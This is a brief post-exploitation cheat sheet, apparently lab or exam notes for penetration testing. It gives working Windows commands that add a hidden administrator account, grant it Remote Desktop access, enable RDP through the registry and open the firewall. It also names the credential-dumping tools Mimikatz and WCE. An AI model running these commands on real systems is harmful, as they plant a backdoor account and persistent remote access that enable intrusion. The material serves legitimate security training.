Post exploitation
Don't.stop.here.you.are.only.halfway.
Proof.txt
cat /root/proof.txttype "C:\Documents and Settings\Administrator\Desktop\proof.txt"Windows
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /addEnable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enableRdesktop resolution
Passwords and hashes
Mimikatz
Windows Credential Editor (WCE)
Networking
PowerShell tools
Empire
PowerSploit
Linux
Spawn TTY shell
Last updated